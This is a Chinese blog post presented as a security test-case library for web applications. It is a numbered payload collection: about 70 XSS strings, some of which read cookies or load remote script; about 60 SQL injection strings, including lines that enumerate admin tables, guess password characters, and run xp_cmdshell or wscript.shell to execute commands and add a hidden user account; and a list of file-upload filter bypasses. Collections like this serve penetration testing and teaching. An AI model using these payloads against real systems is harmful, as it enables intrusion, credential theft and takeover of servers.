安全用例库

最新推荐文章于 2023-12-30 23:15:06 发布

含光（旭）

最新推荐文章于 2023-12-30 23:15:06 发布

阅读量185

点赞数

分类专栏：安全

本文链接：https://blog.csdn.net/demon119/article/details/101425783

版权

安全专栏收录该内容

2 篇文章 0 订阅

订阅专栏

XSS
序号	用例
1	"></iframe><script>alert(123)</script>
2	">><script>alert('xss')</script>
3	"οnfοcus=alert(document.domain)"><"
4	%22%3cscript%3ealert(%22xss%22)%3c/script%3e
5	%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
6	%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
7	%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
8	%3Cscript%3Ealert('XSS')%3C/script%3E
9	);alert('XSS
10	/></a></><img src=1.gif οnerrοr=alert(1)>
11	;exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
12	[color=red' οnmοuseοver="alert('XSS')"]mouse over[/color]
13	[url=javascript:alert('XSS');]click me[/url]
14	</textarea><script>alert(/xss)</script>
15	</title><script>alert(/xss/)</script>
16	<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
17	<?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?>
18	<?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?>
19	<BASE href="javascript:alert('XSS');//">
20	<BGSOUND src="javascript:alert('XSS');">
21	<BODY BACKGROUND="javascript:alert('XSS')">
22	<body onLoad="alert('XSS');"
23	<BODY ONLOAD=alert('XSS')>
24	<body οnunlοad="javascript:alert('XSS');">
25	<br size=\"&{alert('xss')}\">
26	<DIV STYLE="background-image: url(javascript:alert('XSS'))">
27	<div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))">
28	<IFRAME src=javascript:alert('XSS')></IFRAME>
29	<iframe<?php eval chr(11)?>οnlοad=alert('XSS')></iframe>
30	<IMG DYNSRC="javascript:alert('XSS')">
31	<IMG LOWSRC=\"javascript:alert('XSS')\">
32	<IMG src="jav ascript:alert('XSS');">
33	<img src="javascript:alert('XSS')">
34	<IMG src="javascript:alert('XSS');">
35	<IMG SRC=\"jav&#0x9;ascript:alert('xss');\">
36	<img src='java\nscript:alert(\"XSS\")'>
37	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
38	<IMG src=javascript:alert('XSS')>
39	<IMG src=JaVaScRiPt:alert('XSS')>
40	<img src=liu.jpg οnerrοr=alert(/xss/)/>
41	<IMG SRC='vbscript:msgbox(\"XSS\")'>
42	<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
43	<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
44	<LINK REL="stylesheet" href="javascript:alert('XSS');">
45	<marquee><script>alert('xss')</script></marquee>
46	<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
47	<scr<script>ipt>alert('xss');</scr</script>ipt>
48	<script>alert(document.cookie)</script>
49	<script>alert('XSS')</script>
50	<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://test/test.js"></SCRIPT>
51	<script>var var=1; alert(var)</script>
52	<scrscriptipt>alert(1)</scrscriptipt>
53	<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
54	<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
55	<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
56	<style>@im\port'\ja\vasc\ript:alert(\"xss\")';</style>
57	<TABLE BACKGROUND="javascript:alert('XSS')">
58	<XML src="javascript:alert('XSS');">
59	='><script>alert(document.cookie)</script>
60	> <BODY ONLOAD=a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
61	>'"><img src="javascript:alert('xss')">
62	><BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert(XSS")>
63	><script alert(String.fromCharCode(88,83,83))</script>
64	><script>alert(1)</script>
65	><script>alert(document.cookie)</script>
66	'>><marquee><h1>XSS<h1></marquee>
67	a?<script>alert('Vulnerable')</script>
68	Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<
69	getURL("javascript:alert('XSS')")
70	window.alert("XSS");
sql注入
序号	用例
1	admin'--
2	' or 0=0 --
3	" or 0=0 --
4	or 0=0 --
5	' or 0=0 #
6	" or 0=0 #
7	or 0=0 #
8	' or 'x'='x
9	" or "x"="x
10	') or ('x'='x
11	' or 1=1--
12	" or 1=1--
13	or 1=1--
14	' or a=a--
15	" or "a"="a
16	') or ('a'='a
17	") or ("a"="a
18	hi" or "a"="a
19	hi" or 1=1 --
20	hi' or 1=1 --
21	hi' or 'a'='a
22	hi') or ('a'='a
23	hi") or ("a"="a[/code]
24	; and 1=1 and 1=2
25	and 0<>(select count() from )
26	and 0<>(select count(*) from admin)
27	and 0<(select count(*) from admin)
28	and 1<(select count(*) from admin)
29	and 1=(select count() from admin where len()>0)--
30	and 1=(select count(*) from admin where len(用户字段名称name)>0)
31	and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
32	and 1=(select count() from admin where len()>0)
33	and 1=(select count(*) from admin where len(name)>6) 错误
34	and 1=(select count(*) from admin where len(name)>5) 正确长度是6
35	and 1=(select count(*) from admin where len(name)=6) 正确
36	and 1=(select count(*) from admin where len(password)>11) 正确
37	and 1=(select count(*) from admin where len(password)>12) 错误长度是12
38	and 1=(select count(*) from admin where len(password)=12) 正确
39	and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
40	and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
41	and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
42	and 1=(select @@VERSION)--
43	and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin))--
44	and sa=(Select System_blank>_user)--
45	and user_blank>_name()=dbo--
46	and 0<>(select user_blank>_name()--
47	and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank>_cmdshell)--
48	;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--
49	;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
50	;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
51	;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
52	;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"--
53	declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
54	and 0<>(select top 1 paths from newtable)--
55	and 1=(select name from master.dbo.sysdatabases where dbid=7)--
56	and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
57	and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U)
58	and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))
59	and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
60	and uid>(str(id)))
61	and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)
62	and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
上传漏洞
序号	用例
1	检查后缀	上传.htaccess	黑名单
1		后缀大小写绕过	黑名单
1		点绕过	黑名单
1		空格绕过	黑名单
1		::$DATA绕过	黑名单
1		配合解析漏洞	黑名单
1		双后缀名绕过	黑名单
1		MIME绕过	白名单
1		%00截断	白名单
1		0x00截断	白名单
1		0x0a截断	白名单
1	检查内容	文件头检查
1		突破getimagesize()
1		突破exif_imagetype()
1		二次渲染
1	其它	竞争条件
1		上传文件是否有格式限制,是否可以上传exe文件；
1		上传文件是否有大小限制,上传太大的文件是否导致异常错误,上传0K的文件是否会导致异常错误,上传并不存在的文件是否会导致异常错误；
1		通过修改扩展名的方式是否可以绕过格式限制，是否可以通过压包方式绕过格式限制；
1		上传文件大小大于本地剩余空间大小，是否会出现异常错误。
1		gif文件头欺骗